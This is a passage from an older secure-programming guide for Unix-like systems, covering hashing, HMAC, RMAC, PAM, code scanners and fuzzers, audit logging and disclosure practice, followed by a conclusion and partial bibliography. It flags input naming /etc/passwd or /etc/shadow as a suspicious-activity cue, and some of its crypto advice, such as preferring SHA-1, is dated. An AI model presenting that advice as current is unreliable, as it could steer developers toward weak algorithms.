some suggested curves; finding curves is hard). However, be careful -
elliptic curve cryptography isn't patented, but certain speedup techniques
are patented. Elliptic curve cryptography is fast enough that it really
doesn't need these speedups anyway for its usual use of encrypting session /
bulk encryption keys. In general, you shouldn't try to do bulk encryption
with elliptic keys; symmetric algorithms are much faster and are
better-tested for the job.
-----------------------------------------------------------------------------

11.5.4. Cryptographic Hash Algorithms

Some programs need a one-way cryptographic hash algorithm, that is, a
function that takes an ``arbitrary'' amount of data and generates a
fixed-length number that hard for an attacker to invert (e.g., it's difficult
for an attacker to create a different set of data to generate that same
value). For a number of years MD5 has been a favorite, but recent efforts
have shown that its 128-bit length may not be enough [van Oorschot 1994] and
that certain attacks weaken MD5's protection [Dobbertin 1996]. Indeed, there
are rumors that a top industry cryptographer has broken MD5, but is bound by
employee agreement to keep silent (see the Bugtraq 22 August 2000 posting by
John Viega). Anyone can create a rumor, but enough weaknesses have been found
that the idea of completing the break is plausible. If you're writing new
code, use SHA-1 instead of MD5. Don't use the original SHA (now called
``SHA-0''); SHA-0 had the same weakness that MD5 does. If you need more bits
in your hash algorithm, use SHA-256, SHA-384, or SHA-512; you can get the
specifications in NIST FIPS PUB 180-2.
-----------------------------------------------------------------------------

11.5.5. Integrity Checking

When communicating, you need some sort of integrity check (don't depend just
on encryption, since an attacker can then induce changes of information to
``random'' values). This can be done with hash algorithms, but don't just use
a hash function directly (this exposes users to an ``extension'' attack - the
attacker can use the hash value, add data of their choosing, and compute the
new hash). The usual approach is ``HMAC'', which computes the integrity check
as
  H(k xor opad, H(k xor ipad, data)).
where H is the hash function (typically MD5 or SHA-1) and k is the key. Thus,
integrity checks are often HMAC-MD5 or HMAC-SHA-1. Note that although MD5 has
some weaknesses, as far as I know MD5 isn't vulnerable when used in this
construct, so HMAC-MD5 is (to my knowledge) okay. This is defined in detail
in IETF RFC 2104.

Note that in the HMAC approach, a receiver can forge the same data as a
sender. This isn't usually a problem, but if this must be avoided, then use
public key methods and have the sender ``sign'' the data with the sender
private key - this avoids this forging attack, but it's more expensive and
for most environments isn't necessary.
-----------------------------------------------------------------------------

11.5.6. Randomized Message Authentication Mode (RMAC)

NIST has developed and proposed a new mode for using cryptographic algorithms
called [http://www.counterpane.com/crypto-gram-0301.html] Randomized Message
Authentication Code (RMAC). RMAC is intended for use as a message
authentication code technique.

Although there's a formal proof showing that RMAC is secure, the proof
depends on the highly questionable assumption that the underlying
cryptographic algorithm meets the "ideal cipher model" - in particular, that
the algorithm is secure against a variety of specialized attacks, including
related-key attacks. Unfortunately, related-key attacks are poorly studied
for many algorithms; this is not the kind of property or attack that most
people worry about when analyzing with cryptographic algorithms. It's known
triple-DES doesn't have this properly, and it's unclear if other
widely-accepted algorithms like AES have this property (it appears that AES
is at least weaker against related key attacks than usual attacks).

The best advice right now is "don't use RMAC". There are other ways to do
message authentication, such as HMAC combined with a cryptographic hash
algorithm (e.g., HMAC-SHA1). HMAC isn't the same thing (e.g., technically it
doesn't include a nonce, so you should rekey sooner), but the theoretical
weaknesses of HMAC are merely theoretical, while the problems in RMAC seem
far more important in the real world.
-----------------------------------------------------------------------------

11.5.7. Other Cryptographic Issues

You should both encrypt and include integrity checks of data that's
important. Don't depend on the encryption also providing integrity - an
attacker may be able to change the bits into a different value, and although
the attacker may not be able to change it to a specific value, merely
changing the value may be enough. In general, you should use different keys
for integrity and secrecy, to avoid certain subtle attacks.

One issue not discussed often enough is the problem of ``traffic analysis.''
That is, even if messages are encrypted and the encryption is not broken, an
adversary may learn a great deal just from the encrypted messages. For
example, if the presidents of two companies start exchanging many encrypted
email messages, it may suggest that the two comparies are considering a
merger. For another example, many SSH implementations have been found to have
a weakness in exchanging passwords: observers could look at packets and
determine the length (or length range) of the password, even if they couldn't
determine the password itself. They could also also determine other
information about the password that significantly aided in breaking it.

Be sure to not make it possible to solve a problem in parts, and use
different keys when the trust environment (who is trusted) changes. Don't use
the same key for too long - after a while, change the session key or password
so an adversary will have to start over.

Generally you should compress something you'll encrypt - this does add a
fixed header, which isn't so good, but it eliminates many patterns in the
rest of the message as well as making the result smaller, so it's usually
viewed as a ``win'' if compression is likely to make the result smaller.

In a related note, if you must create your own communication protocol,
examine the problems of what's gone on before. Classics such as Bellovin
[1989]'s review of security problems in the TCP/IP protocol suite might help
you, as well as Bruce Schneier [1998] and Mudge's breaking of Microsoft's
PPTP implementation and their follow-on work. Again, be sure to give any new
protocol widespread public review, and reuse what you can.
-----------------------------------------------------------------------------

11.6. Using PAM

Pluggable Authentication Modules (PAM) is a flexible mechanism for
authenticating users. Many Unix-like systems support PAM, including Solaris,
nearly all Linux distributions (e.g., Red Hat Linux, Caldera, and Debian as
of version 2.2), and FreeBSD as of version 3.1. By using PAM, your program
can be independent of the authentication scheme (passwords, SmartCards,
etc.). Basically, your program calls PAM, which at run-time determines which
``authentication modules'' are required by checking the configuration set by
the local system administrator. If you're writing a program that requires
authentication (e.g., entering a password), you should include support for
PAM. You can find out more about the Linux-PAM project at [http://
www.kernel.org/pub/linux/libs/pam/index.html] http://www.kernel.org/pub/linux
/libs/pam/index.html.
-----------------------------------------------------------------------------

11.7. Tools

Some tools may help you detect security problems before you field the result.
They can't find all such problems, of course, but they can help catch
problems that would overwise slip by. Here are a few tools, emphasizing open
source / free software tools.

One obvious type of tool is a program to examine the source code to search
for patterns of known potential security problems (e.g., calls to library
functions in ways are often the source of security vulnerabilities). These
kinds of programs are called ``source code scanners''. Here are a few such
tools:

<A0><A0>*<2A>Flawfinder, which I've developed; it's available at [http://
    www.dwheeler.com/flawfinder] http://www.dwheeler.com/flawfinder. This is
    also a program that scans C/C++ source code for common problems, and is
    also licensed under the GPL. Unlike RATS, flawfinder is implemented in
    Python. The developers of RATS and Flawfinder have agreed to find a way
    to work together to create a single ``best of breed'' open source
    program.

<A0><A0>*<2A>RATS (Rough Auditing Tool for Security) from Secure Software Solutions is
    available at [http://www.securesw.com/rats] http://www.securesw.com/rats.
    This program scans C/C++ source code for common problems, and is licensed
    under the GPL.

<A0><A0>*<2A>ITS4 from Cigital (formerly Reliable Software Technologies, RST) also
    statically checks C/C++ code. It is available free for non-commercial
    use, including its source code and with certain modification and
    redistribution rights. Note that this isn't released as ``open source''
    as defined by the Open Source Definition (OSD) - In particular, OSD point
    6 forbids ``non-commercial use only'' clauses in open source licenses.
    ITS4 is available at [http://www.rstcorp.com/its4] http://www.rstcorp.com
    /its4.

<A0><A0>*<2A>Splint (formerly named LCLint) is a tool for statically checking C
    programs. With minimal effort, splint can be used as a better lint. If
    additional effort is invested adding annotations to programs, splint can
    perform stronger checking than can be done by any standard lint. For
    example, it can be used to statically detect likely buffer overflows. The
    software is licensed under the GPL and is available at [http://
    www.splint.org] http://www.splint.org.

<A0><A0>*<2A>cqual is a type-based analysis tool for finding bugs in C programs. cqual
    extends the type system of C with extra user-defined type qualifiers,
    e.g., it can note that values are ``tainted'' or ``untainted'' (similar
    to Perl's taint checking). The programmer annotates their program in a
    few places, and cqual performs qualifier inference to check whether the
    annotations are correct. cqual presents the analysis results using
    Program Analysis Mode, an emacs-based interface. The current version of
    cqual can detect potential format-string vulnerabilities in C programs. A
    previous incarnation of cqual, Carillon, has been used to find Y2K bugs
    in C programs. The software is licensed under the GPL and is available
    from [http://www.cs.berkeley.edu/Research/Aiken/cqual] http://
    www.cs.berkeley.edu/Research/Aiken/cqual.

<A0><A0>*<2A>Cyclone is a C-like language intended to remove C's security weaknesses.
    In theory, you can always switch to a language that is ``more secure,''
    but this doesn't always help (a language can help you avoid common
    mistakes but it can't read your mind). John Viega has reviewed Cyclone,
    and in December 2001 he said: ``Cyclone is definitely a neat language.
    It's a C dialect that doesn't feel like it's taking away any power, yet
    adds strong safety guarantees, along with numerous features that can be a
    real boon to programmers. Unfortunately, Cyclone isn't yet ready for
    prime time. Even with crippling limitations aside, it doesn't yet offer
    enough advantages over Java (or even C with a good set of tools) to make
    it worth the risk of using what is still a very young technology. Perhaps
    in a few years, Cyclone will mature into a robust, widely supported
    language that comes dangerously close to C in terms of efficiency. If
    that day comes, you'll certainly see me abandoning C for good.'' The
    Cyclone compiler has been released under the GPL and LGPL. You can get
    more information from the [http://www.research.att.com/projects/cyclone]
    Cyclone web site.


Some tools try to detect potential security flaws at run-time, either to
counter them or at least to warn the developer about them. Much of Crispen
Cowan's work, such as StackGuard, fits here.

There are several tools that try to detect various C/C++ memory-management
problems; these are really general-purpose software quality improvement
tools, and not specific to security, but memory management problems can
definitely cause security problems. An especially capable tool is [http://
developer.kde.org/~sewardj] Valgrind, which detects various memory-management
problems (such as use of uninitialized memory, reading/writing memory after
it's been free'd, reading/writing off the end of malloc'ed blocks, and memory
leaks). Another such tool is Electric Fence (efence) by Bruce Perens, which
can detect certain memory management errors. [http://www.linkdata.se/
sourcecode.html] Memwatch (public domain) and [http://odin.ac.hmc.edu/
~neldredge/yamd/] YAMD (GPL) can detect memory allocation problems for C and
C++. You can even use the built-in capabilities of the GNU C library's malloc
library, which has the MALLOC_CHECK_ environment variable (see its manual
page for more information). There are many others.

Another approach is to create test patterns and run the program, in attempt
to find weaknesses in the program. Here are a few such tools:

<A0><A0>*<2A>BFBTester, the Brute Force Binary Tester, is licensed under the GPL. This
    program does quick security checks of binary programs. BFBTester performs
    checks of single and multiple argument command line overflows and
    environment variable overflows. Version 2.0 and higher can also watch for
    tempfile creation activity (to check for using unsafe tempfile names). At
    one time BFBTester didn't run on Linux (due to a technical issue in
    Linux's POSIX threads implementation), but this has been fixed as of
    version 2.0.1. More information is available at [http://
    bfbtester.sourceforge.net/] http://bfbtester.sourceforge.net/

<A0><A0>*<2A>The [http://fuzz.sourceforge.net] fuzz program is a tool for testing
    other software. It tests programs by bombarding the program being
    evaluated with random data. This tool isn't really specific to security.

<A0><A0>*<2A>[http://www.immunitysec.com/spike.html] SPIKE is a "fuzzer creation kit",
    i.e., it's a toolkit designed to create "random" tests to find security
    problems. The SPIKE toolkit is particularly designed for protocol
    analysis by simulating network protocol clients, and SPIKE proXy is a
    tool built on SPIKE to test web applications. SPIKE includes a few
    pre-canned tests. SPIKE is licensed under the GPL.


There are a number tools that try to give you insight into running programs
that can also be useful when trying to find security problems in your code.
This includes symbolic debuggers (such as gdb) and trace programs (such as
strace and ltrace). One interesting program to support analysis of running
code is [http://razor.bindview.com/tools/fenris] Fenris (GPL license). Its
documentation describes Fenris as a ``multipurpose tracer, stateful analyzer
and partial decompiler intended to simplify bug tracking, security audits,
code, algorithm or protocol analysis - providing a structural program trace,
general information about internal constructions, execution path, memory
operations, I/O, conditional expressions and much more.'' Fenris actually
supplies a whole suite of tools, including extensive forensics capabilities
and a nice debugging GUI for Linux. A list of other promising open source
tools that can be suitable for debugging or code analysis is available at
[http://lcamtuf.coredump.cx/fenris/debug-tools.html] http://
lcamtuf.coredump.cx/fenris/debug-tools.html. Another interesting program
along these lines is Subterfugue, which allows you to control what happens in
every system call made by a program.

If you're building a common kind of product where many standard potential
flaws exist (like an ftp server or firewall), you might find standard
security scanning tools useful. One good one is [http://www.nessus.org]
Nessus; there are many others. These kinds of tools are very useful for doing
regression testing, but since they essentially use a list of past specific
vulnerabilities and common configuration errors, they may not be very helpful
in finding problems in new programs.

Often, you'll need to call on other tools to implement your secure
infrastructure. The [http://ospkibook.sourceforge.net] Open-Source PKI Book
describes a number of open source programs for implmenting a public key
infrastructure (PKI).

Of course, running a ``secure'' program on an insecure platform configuration
makes little sense. You may want to examine hardening systems, which attempt
to configure or modify systems to be more resistant to attacks. For Linux,
one hardening system is Bastille Linux, available at [http://
www.bastille-linux.org] http://www.bastille-linux.org.
-----------------------------------------------------------------------------

11.8. Windows CE

If you're securing a Windows CE Device, you should read Maricia Alforque's
"Creating a Secure Windows CE Device" at [http://msdn.microsoft.com/library/
techart/winsecurity.htm] http://msdn.microsoft.com/library/techart/
winsecurity.htm.
-----------------------------------------------------------------------------

11.9. Write Audit Records

Write audit logs for program startup, session startup, and for suspicious
activity. Possible information of value includes date, time, uid, euid, gid,
egid, terminal information, process id, and command line values. You may find
the function syslog(3) helpful for implementing audit logs. One awkward
problem is that any logging system should be able to record a lot of
information (since this information could be very helpful), yet if the
information isn't handled carefully the information itself could be used to
create an attack. After all, the attacker controls some of the input being
sent to the program. When recording data sent by a possible attacker,
identify a list of ``expected'' characters and escape any ``unexpected''
characters so that the log isn't corrupted. Not doing this can be a real
problem; users may include characters such as control characters (especially
NIL or end-of-line) that can cause real problems. For example, if an attacker
embeds a newline, they can then forge log entries by following the newline
with the desired log entry. Sadly, there doesn't seem to be a standard
convention for escaping these characters. I'm partial to the URL escaping
mechanism (%hh where hh is the hexadecimal value of the escaped byte) but
there are others including the C convention (\ooo for the octal value and \X
where X is a special symbol, e.g., \n for newline). There's also the
caret-system (^I is control-I), though that doesn't handle byte values over
127 gracefully.

There is the danger that a user could create a denial-of-service attack (or
at least stop auditing) by performing a very large number of events that cut
an audit record until the system runs out of resources to store the records.
One approach to counter to this threat is to rate-limit audit record
recording; intentionally slow down the response rate if ``too many'' audit
records are being cut. You could try to slow the response rate only to the
suspected attacker, but in many situations a single attacker can masquerade
as potentially many users.

Selecting what is ``suspicious activity'' is, of course, dependent on what
the program does and its anticipated use. Any input that fails the filtering
checks discussed earlier is certainly a candidate (e.g., containing NIL).
Inputs that could not result from normal use should probably be logged, e.g.,
a CGI program where certain required fields are missing in suspicious ways.
Any input with phrases like /etc/passwd or /etc/shadow or the like is very
suspicious in many cases. Similarly, trying to access Windows ``registry''
files or .pwl files is very suspicious.

Do not record passwords in an audit record. Often people accidentally enter
passwords for a different system, so recording a password may allow a system
administrator to break into a different computer outside the administrator's
domain.
-----------------------------------------------------------------------------

11.10. Physical Emissions

Although it's really outside the scope of this book, it's important to
remember that computing and communications equipment leaks a lot information
that makes them hard to really secure. Many people are aware of TEMPEST
requirements which deal with radio frequency emissions of computers,
displays, keyboards, and other components which can be eavesdropped. The
light from displays can also be eavesdropped, even if it's bounced off an
office wall at great distance [Kuhn 2002]. Modem lights are also enough to
determine the underlying communication.
-----------------------------------------------------------------------------

11.11. Miscellaneous

The following are miscellaneous security guidelines that I couldn't seem to
fit anywhere else:

Have your program check at least some of its assumptions before it uses them
(e.g., at the beginning of the program). For example, if you depend on the
``sticky'' bit being set on a given directory, test it; such tests take
little time and could prevent a serious problem. If you worry about the
execution time of some tests on each call, at least perform the test at
installation time, or even better at least perform the test on application
start-up.

If you have a built-in scripting language, it may be possible for the
language to set an environment variable which adversely affects the program
invoking the script. Defend against this.

If you need a complex configuration language, make sure the language has a
comment character and include a number of commented-out secure examples.
Often '#' is used for commenting, meaning ``the rest of this line is a
comment''.

If possible, don't create setuid or setgid root programs; make the user log
in as root instead.

Sign your code. That way, others can check to see if what's available was
what was sent.

In some applications you may need to worry about timing attacks, where the
variation in timing or CPU utilitization is enough to give away important
information. This kind of attack has been used to obtain keying information
from Smartcards, for example. Mauro Lacy has published a paper titled [http:/
/maurol.com.ar/security/RTT.pdf] Remote Timing Techniques, showing that you
can (in some cases) determine over an Internet whether or not a given user id
exists, simply from the effort expended by the CPU (which can be detected
remotely using techniques described in the paper). The only way to deal with
these sorts of problems is to make sure that the same effort is performed
even when it isn't necessary. The problem is that in some cases this may make
the system more vulnerable to a denial of service attack, since it can't
optimize away unnecessary work.

Consider statically linking secure programs. This counters attacks on the
dynamic link library mechanism by making sure that the secure programs don't
use it. There are several downsides to this however. This is likely to
increase disk and memory use (from multiple copies of the same routines).
Even worse, it makes updating of libraries (e.g., for security
vulnerabilities) more difficult - in most systems they won't be automatically
updated and have to be tracked and implemented separately.

When reading over code, consider all the cases where a match is not made. For
example, if there is a switch statement, what happens when none of the cases
match? If there is an ``if'' statement, what happens when the condition is
false?

Merely ``removing'' a file doesn't eliminate the file's data from a disk; on
most systems this simply marks the content as ``deleted'' and makes it
eligible for later reuse, and often data is at least temporarily stored in
other places (such as memory, swap files, and temporary files). Indeed,
against a determined attacker, writing over the data isn't enough. A classic
paper on the problems of erasing magnetic media is Peter Gutmann's paper
[http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html] ``Secure
Deletion of Data from Magnetic and Solid-State Memory''. A determined
adversary can use other means, too, such as monitoring electromagnetic
emissions from computers (military systems have to obey TEMPEST rules to
overcome this) and/or surreptitious attacks (such as monitors hidden in
keyboards).

When fixing a security vulnerability, consider adding a ``warning'' to detect
and log an attempt to exploit the (now fixed) vulnerability. This will reduce
the likelihood of an attack, especially if there's no way for an attacker to
predetermine if the attack will work, since it exposes an attack in progress.
In short, it turns a vulnerability into an intrusion detection system. This
also suggests that exposing the version of a server program before
authentication is usually a bad idea for security, since doing so makes it
easy for an attacker to only use attacks that would work. Some programs make
it possible for users to intentionally ``lie'' about their version, so that
attackers will use the ``wrong attacks'' and be detected. Also, if the
vulnerability can be triggered over a network, please make sure that security
scanners can detect the vulnerability. I suggest contacting Nessus ([http://
www.nessus.org] http://www.nessus.org) and make sure that their open source
security scanner can detect the problem. That way, users who don't check
their software for upgrades will at least learn about the problem during
their security vulnerability scans (if they do them as they should).

Always include in your documentation contact information for where to report
security problems. You should also support at least one of the common email
addresses for reporting security problems (security-alert@SITE, secure@SITE,
or security@SITE); it's often good to have support@SITE and info@SITE working
as well. Be prepared to support industry practices by those who have a
security flaw to report, such as the [http://www.wiretrip.net/rfp/
policy.html] Full Disclosure Policy (RFPolicy) and the IETF Internet draft,
``Responsible Vulnerability Disclosure Process''. It's important to quickly
work with anyone who is reporting a security flaw; remember that they are
doing you a favor by reporting the problem to you, and that they are under no
obligation to do so. It's especially important, once the problem is fixed, to
give proper credit to the reporter of the flaw (unless they ask otherwise).
Many reporters provide the information solely to gain the credit, and it's
generally accepted that credit is owed to the reporter. Some vendors argue
that people should never report vulnerabilities to the public; the problem
with this argument is that this was once common, and the result was vendors
who denied vulnerabilities while their customers were getting constantly
subverted for years at a time.

Follow best practices and common conventions when leading a software
development project. If you are leading an open source software / free
software project, some useful guidelines can be found in [http://www.tldp.org
/HOWTO/Software-Proj-Mgmt-HOWTO/index.html] Free Software Project Management
HOWTO and [http://www.tldp.org/HOWTO/Software-Release-Practice-HOWTO/
index.html] Software Release Practice HOWTO; you should also read [http://
www.catb.org/~esr/writings/cathedral-bazaar] The Cathedral and the Bazaar.

Every once in a while, review security guidelines like this one. At least
re-read the conclusions in Chapter 12, and feel free to go back to the
introduction (Chapter 1) and start again!
-----------------------------------------------------------------------------

Chapter 12. Conclusion

<A0>                                      The end of a matter is better than its
                                       beginning, and patience is better than
                                       pride.
<A0>                                                      Ecclesiastes 7:8 (NIV)

Designing and implementing a truly secure program is actually a difficult
task on Unix-like systems such as Linux and Unix. The difficulty is that a
truly secure program must respond appropriately to all possible inputs and
environments controlled by a potentially hostile user. Developers of secure
programs must deeply understand their platform, seek and use guidelines (such
as these), and then use assurance processes (such as inspections and other
peer review techniques) to reduce their programs' vulnerabilities.

In conclusion, here are some of the key guidelines in this book:

<A0><A0>*<2A>Validate all your inputs, including command line inputs, environment
    variables, CGI inputs, and so on. Don't just reject ``bad'' input; define
    what is an ``acceptable'' input and reject anything that doesn't match.

<A0><A0>*<2A>Avoid buffer overflow. Make sure that long inputs (and long intermediate
    data values) can't be used to take over your program. This is the primary
    programmatic error at this time.

<A0><A0>*<2A>Structure program internals. Secure the interface, minimize privileges,
    make the initial configuration and defaults safe, and fail safe. Avoid
    race conditions (e.g., by safely opening any files in a shared directory
    like /tmp). Trust only trustworthy channels (e.g., most servers must not
    trust their clients for security checks or other sensitive data such as
    an item's price in a purchase).

<A0><A0>*<2A>Carefully call out to other resources. Limit their values to valid values
    (in particular be concerned about metacharacters), and check all system
    call return values.

<A0><A0>*<2A>Reply information judiciously. In particular, minimize feedback, and
    handle full or unresponsive output to an untrusted user.


-----------------------------------------------------------------------------

Chapter 13. Bibliography

<A0>                                      The words of the wise are like goads,
                                       their collected sayings like firmly
                                       embedded nails--given by one Shepherd.
                                       Be warned, my son, of anything in
                                       addition to them. Of making many books
                                       there is no end, and much study
                                       wearies the body.
<A0>                                                 Ecclesiastes 12:11-12 (NIV)

Note that there is a heavy emphasis on technical articles available on the
web, since this is where most of this kind of technical information is
available.

[Advosys 2000] Advosys Consulting (formerly named Webber Technical Services).
Writing Secure Web Applications. [http://advosys.ca/tips/web-security.html]
http://advosys.ca/tips/web-security.html

[Al-Herbish 1999] Al-Herbish, Thamer. 1999. Secure Unix Programming FAQ.
[http://www.whitefang.com/sup] http://www.whitefang.com/sup.

[Aleph1 1996] Aleph1. November 8, 1996. ``Smashing The Stack For Fun And
Profit''. Phrack Magazine. Issue 49, Article 14. [http://www.phrack.com/
search.phtml?view&article=p49-14] http://www.phrack.com/search.phtml?view&
article=p49-14 or alternatively [http://www.2600.net/phrack/p49-14.html]
http://www.2600.net/phrack/p49-14.html.

[Anonymous 1999] Anonymous. October 1999. Maximum Linux Security: A Hacker's
Guide to Protecting Your Linux Server and Workstation Sams. ISBN: 0672316706.

[Anonymous 1998] Anonymous. September 1998. Maximum Security : A Hacker's
Guide to Protecting Your Internet Site and Network. Sams. Second Edition.
ISBN: 0672313413.

[Anonymous Phrack 2001] Anonymous. August 11, 2001. Once upon a free().
Phrack, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12. [http://phrack.org/
show.php?p=57&a=9] http://phrack.org/show.php?p=57&a=9

[AUSCERT 1996] Australian Computer Emergency Response Team (AUSCERT) and
O'Reilly. May 23, 1996 (rev 3C). A Lab Engineers Check List for Writing
Secure Unix Code. [ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist] ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist

[Bach 1986] Bach, Maurice J. 1986. The Design of the Unix Operating System.
Englewood Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-201799-7 025.

[Beattie 2002] Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris
Wright, Adam Shostack. November 2002. Timing the Application of Security
Patches for Optimal Uptime. 2002 LISA XVI, November 3-8, 2002, Philadelphia,
PA.

[Bellovin 1989] Bellovin, Steven M. April 1989. "Security Problems in the TCP
/IP Protocol Suite" Computer Communications Review 2:19, pp. 32-48. [http://
www.research.att.com/~smb/papers/ipext.pdf] http://www.research.att.com/~smb/
papers/ipext.pdf

[Bellovin 1994] Bellovin, Steven M. December 1994. Shifting the Odds --
Writing (More) Secure Software. Murray Hill, NJ: AT&T Research. [http://
www.research.att.com/~smb/talks] http://www.research.att.com/~smb/talks

[Bishop 1996] Bishop, Matt. May 1996. ``UNIX Security: Security in
Programming''. SANS '96. Washington DC (May 1996). [http://
olympus.cs.ucdavis.edu/~bishop/secprog.html] http://olympus.cs.ucdavis.edu/
~bishop/secprog.html

[Bishop 1997] Bishop, Matt. October 1997. ``Writing Safe Privileged
Programs''. Network Security 1997 New Orleans, LA. [http://
olympus.cs.ucdavis.edu/~bishop/secprog.html] http://olympus.cs.ucdavis.edu/
~bishop/secprog.html

[Blaze 1996] Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier,
Tsutomu Shimomura, Eric Thompson, and Michael Wiener. January 1996. ``Minimal
Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security: A
Report by an Ad Hoc Group of Cryptographers and Computer Scientists.'' [ftp:/
/ftp.research.att.com/dist/mab/keylength.txt] ftp://ftp.research.att.com/dist
/mab/keylength.txt and [ftp://ftp.research.att.com/dist/mab/keylength.ps]
ftp://ftp.research.att.com/dist/mab/keylength.ps.

[CC 1999] The Common Criteria for Information Technology Security Evaluation
(CC). August 1999. Version 2.1. Technically identical to International
Standard ISO/IEC 15408:1999. [http://csrc.nist.gov/cc/ccv20/ccv2list.htm]
http://csrc.nist.gov/cc/ccv20/ccv2list.htm

[CERT 1998] Computer Emergency Response Team (CERT) Coordination Center (CERT
/CC). February 13, 1998. Sanitizing User-Supplied Data in CGI Scripts. CERT
Advisory CA-97.25.CGI_metachar. [http://www.cert.org/advisories/
CA-97.25.CGI_metachar.html] http://www.cert.org/advisories/
CA-97.25.CGI_metachar.html.

[Cheswick 1994] Cheswick, William R. and Steven M. Bellovin. Firewalls and
Internet Security: Repelling the Wily Hacker. Full text at [http://
www.wilyhacker.com] http://www.wilyhacker.com.

[Clowes 2001] Clowes, Shaun. 2001. ``A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP'' [http://www.securereality.com.au/archives.html]
http://www.securereality.com.au/archives.html

[CMU 1998] Carnegie Mellon University (CMU). February 13, 1998 Version 1.4.
``How To Remove Meta-characters From User-Supplied Data In CGI Scripts''.
[ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters] ftp://ftp.cert.org/pub/
tech_tips/cgi_metacharacters.

[Cowan 1999] Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
Jonathan Walpole. ``Buffer Overflows: Attacks and Defenses for the
Vulnerability of the Decade''. Proceedings of DARPA Information Survivability
Conference and Expo (DISCEX), [http://schafercorp-ballston.com/discex] http:/
/schafercorp-ballston.com/discex SANS 2000. [http://www.sans.org/newlook/
events/sans2000.htm] http://www.sans.org/newlook/events/sans2000.htm. For a
copy, see [http://immunix.org/documentation.html] http://immunix.org/
documentation.html.

[Cox 2000] Cox, Philip. March 30, 2001. Hardening Windows 2000. [http://
www.systemexperts.com/win2k/hardenW2K11.pdf] http://www.systemexperts.com/
win2k/hardenW2K11.pdf.

[Dobbertin 1996]. Dobbertin, H. 1996. The Status of MD5 After a Recent
Attack. RSA Laboratories' CryptoBytes. Vol. 2, No. 2.

[Felten 1997] Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach.
Web Spoofing: An Internet Con Game Technical Report 540-96 (revised Feb.
1997) Department of Computer Science, Princeton University [http://
www.cs.princeton.edu/sip/pub/spoofing.pdf] http://www.cs.princeton.edu/sip/
pub/spoofing.pdf

[Fenzi 1999] Fenzi, Kevin, and Dave Wrenski. April 25, 1999. Linux Security
HOWTO. Version 1.0.2. [http://www.tldp.org/HOWTO/Security-HOWTO.html] http://
www.tldp.org/HOWTO/Security-HOWTO.html

[FHS 1997] Filesystem Hierarchy Standard (FHS 2.0). October 26, 1997.
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan. Version 2.0.
[http://www.pathname.com/fhs] http://www.pathname.com/fhs.

[Filipski 1986] Filipski, Alan and James Hanko. April 1986. ``Making Unix
Secure.'' Byte (Magazine). Peterborough, NH: McGraw-Hill Inc. Vol. 11, No. 4.
ISSN 0360-5280. pp. 113-128.

[Flake 2001] Flake, Havlar. Auditing Binaries for Security Vulnerabilities.
[http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html] http://
www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html.

[FOLDOC] Free On-Line Dictionary of Computing. [http://foldoc.doc.ic.ac.uk/
foldoc/index.html] http://foldoc.doc.ic.ac.uk/foldoc/index.html.

[Forristal 2001] Forristal, Jeff, and Greg Shipley. January 8, 2001.
Vulnerability Assessment Scanners. Network Computing. [http://www.nwc.com/
1201/1201f1b1.html] http://www.nwc.com/1201/1201f1b1.html

[FreeBSD 1999] FreeBSD, Inc. 1999. ``Secure Programming Guidelines''. FreeBSD
Security Information. [http://www.freebsd.org/security/security.html] http://
www.freebsd.org/security/security.html

[Friedl 1997] Friedl, Jeffrey E. F. 1997. Mastering Regular Expressions.
O'Reilly. ISBN 1-56592-257-3.

[FSF 1998] Free Software Foundation. December 17, 1999. Overview of the GNU
Project. [http://www.gnu.ai.mit.edu/gnu/gnu-history.html] http://
www.gnu.ai.mit.edu/gnu/gnu-history.html

[FSF 1999] Free Software Foundation. January 11, 1999. The GNU C Library
Reference Manual. Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C
Library. Available at, for example, [http://www.netppl.fi/~pp/glibc21/
libc_toc.html] http://www.netppl.fi/~pp/glibc21/libc_toc.html

[Fu 2001] Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster. August 2001.
``Dos and Don'ts of Client Authentication on the Web''. Proceedings of the
10th USENIX Security Symposium, Washington, D.C., August 2001. [http://
cookies.lcs.mit.edu/pubs/webauth.html] http://cookies.lcs.mit.edu/pubs/
webauth.html.

[Gabrilovich 2002] Gabrilovich, Evgeniy, and Alex Gontmakher. February 2002.
``Inside Risks: The Homograph Attack''. Communications of the ACM. Volume 45,
Number 2. Page 128.

[Galvin 1998a] Galvin, Peter. April 1998. ``Designing Secure Software''.
Sunworld. [http://www.sunworld.com/swol-04-1998/swol-04-security.html] http:/
/www.sunworld.com/swol-04-1998/swol-04-security.html.

[Galvin 1998b] Galvin, Peter. August 1998. ``The Unix Secure Programming
FAQ''. Sunworld. [http://www.sunworld.com/sunworldonline/swol-08-1998/
swol-08-security.html] http://www.sunworld.com/sunworldonline/swol-08-1998/
swol-08-security.html

[Garfinkel 1996] Garfinkel, Simson and Gene Spafford. April 1996. Practical
UNIX & Internet Security, 2nd Edition. ISBN 1-56592-148-8. Sebastopol, CA:
O'Reilly & Associates, Inc. [http://www.oreilly.com/catalog/puis] http://
www.oreilly.com/catalog/puis

[Garfinkle 1997] Garfinkle, Simson. August 8, 1997. 21 Rules for Writing
Secure CGI Programs. [http://webreview.com/wr/pub/97/08/08/bookshelf] http://
webreview.com/wr/pub/97/08/08/bookshelf

[Gay 2000] Gay, Warren W. October 2000. Advanced Unix Programming.
Indianapolis, Indiana: Sams Publishing. ISBN 0-67231-990-X.

[Geodsoft 2001] Geodsoft. February 7, 2001. Hardening OpenBSD Internet
Servers. [http://www.geodsoft.com/howto/harden] http://www.geodsoft.com/howto
/harden.

[Graham 1999] Graham, Jeff. May 4, 1999. Security-Audit's Frequently Asked
Questions (FAQ). [http://lsap.org/faq.txt] http://lsap.org/faq.txt

